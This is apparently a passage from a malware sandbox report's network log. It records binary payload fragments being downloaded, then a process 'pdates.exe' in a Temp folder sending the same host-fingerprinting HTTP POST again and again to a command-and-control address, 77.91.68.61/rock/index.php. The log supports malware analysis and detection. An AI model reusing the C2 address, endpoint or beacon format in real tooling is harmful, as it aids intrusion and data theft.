Jul 27, 2023 01:33:05.265122890 CEST	2756	IN	Data Raw: e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55 8b ec e8 94 07 00 00 85 c0 75 19 83 7d 0c 01 Data Ascii: 0jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=)jt]Vu
Jul 27, 2023 01:33:05.265155077 CEST	2758	IN	Data Raw: 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 c1 10 00 00 8b c2 51 50 Data Ascii: rI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP#+
Jul 27, 2023 01:33:05.265177011 CEST	2759	IN	Data Raw: 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00 8a 41 02 3a 42 02 75 13 83 7c 24 1c ff 0f 84 Data Ascii: uD$D$s:u9\|$A:Bu&\|$A:Bu\|$A:Bt~GwvD$Pt$;D$TD$ D$@B\|$4QCD$$L$DPT$TD$@L$@C\|$Pu0xf90u\|$0D$\|$0L$@T$TD$D$y;%
Jul 27, 2023 01:33:05.265209913 CEST	2760	IN	Data Raw: 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8 c4 22 00 00 83 c4 0c c6 04 3b 00 8b c6 5f 5e Data Ascii: F^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^Q]E
Jul 27, 2023 01:33:05.309492111 CEST	2762	IN	Data Raw: 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85 f6 74 35 53 57 ff 75 08 e8 44 00 00 00 8b f0 Data Ascii: uu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]0UM

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.5	49827	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:31.114099026 CEST	2952	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:31.163480043 CEST	2952	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.5	49828	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:31.344119072 CEST	2953	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:31.392791033 CEST	2953	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.5	49829	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:31.557617903 CEST	2954	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:31.606594086 CEST	2954	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.5	49830	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:31.793322086 CEST	2955	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:31.841269970 CEST	2955	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.5	49831	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:32.001140118 CEST	2956	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:32.048799038 CEST	2956	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.5	49832	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:32.234078884 CEST	2957	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:32.282186985 CEST	2957	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.5	49833	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:32.496284962 CEST	2958	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:32.544895887 CEST	2958	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.5	49834	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:32.945266962 CEST	2959	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:32.995594025 CEST	2959	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.5	49835	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:33.259270906 CEST	2960	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:33.308007956 CEST	2960	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.2.5	49836	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:33.559017897 CEST	2961	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:33.606760979 CEST	2961	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49728	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:05.346261024 CEST	2775	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:05.394104004 CEST	2789	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.2.5	49837	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:34.372004986 CEST	2962	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:34.420125008 CEST	2962	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
121	192.168.2.5	49838	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:34.664072990 CEST	2963	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:34.711486101 CEST	2963	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.5	49839	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:34.976977110 CEST	2964	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:35.025729895 CEST	2964	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.5	49840	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:36.431116104 CEST	2965	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:36.479310989 CEST	2965	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.5	49841	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:36.777601957 CEST	2966	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:36.826761007 CEST	2966	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.5	49842	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:37.039940119 CEST	2967	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:37.088438034 CEST	2967	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.5	49843	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:37.366626978 CEST	2967	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:37.416420937 CEST	2968	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.5	49844	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:37.582923889 CEST	2968	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:37.632091045 CEST	2969	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.5	49845	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:37.794080019 CEST	2969	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:37.850522041 CEST	2970	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.5	49846	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:38.088419914 CEST	2970	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:38.290343046 CEST	2971	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
